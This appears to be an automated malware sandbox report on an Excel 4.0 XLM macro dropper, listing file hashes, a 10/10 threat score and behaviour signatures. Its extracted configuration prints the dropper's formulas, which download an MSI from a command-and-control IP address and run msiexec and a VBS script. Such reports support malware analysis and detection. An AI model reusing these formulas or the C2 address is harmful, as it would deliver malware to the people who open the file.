
General

  • Target: 0fe2799c2a3c64d7f4a4ed2ba8992538
  • Size: 6KB
  • Sample: 231230-f2f5ssfec7
  • MD5: 0fe2799c2a3c64d7f4a4ed2ba8992538
  • SHA1: cf85dcfafc3b70fe8278d94fca3a6e787b60cd86
  • SHA256: 92ff0261aa5ba46511c1bdc9e40b348e7296efcbc8124b21db4f7e7ad69dd97e
  • SHA512: 1d528d9cae734594d6e834afc80393dec7c4779d49fda076893bd693ec5c53eb65a929be09d460c3a6e92f6826797a248d185674328069174e8c4e499160f7ef
  • SSDEEP: 192:NDSTuSj1aEOmmfR48UhHFBFYu2b98y6ufk:NgumwS1FY7b98y6ik

Score: 10/10
xlm

Malware Config

Extracted
  • Rule: Excel 4.0 XLM Macro
  • C2: http://46.17.98.187
  • Attributes (formulas):
      =EXEC("msiexec.exe")
      =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
      =EXEC("wscript C:\ProgramData\start.vbs")
      =HALT()

Extracted
  • Language: xlm4.0
  • Source: xlm40.dropper
  • URLs: http://46.17.98.187

Targets

  • Target: 0fe2799c2a3c64d7f4a4ed2ba8992538
  • Size: 6KB
  • MD5: 0fe2799c2a3c64d7f4a4ed2ba8992538
  • SHA1: cf85dcfafc3b70fe8278d94fca3a6e787b60cd86
  • SHA256: 92ff0261aa5ba46511c1bdc9e40b348e7296efcbc8124b21db4f7e7ad69dd97e
  • SHA512: 1d528d9cae734594d6e834afc80393dec7c4779d49fda076893bd693ec5c53eb65a929be09d460c3a6e92f6826797a248d185674328069174e8c4e499160f7ef
  • SSDEEP: 192:NDSTuSj1aEOmmfR48UhHFBFYu2b98y6ufk:NgumwS1FY7b98y6ik

  Score: 10/10

  • Process spawned unexpected child process
    This typically indicates the parent process was compromised via an exploit or macro.

  • Process spawned suspicious child process
    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks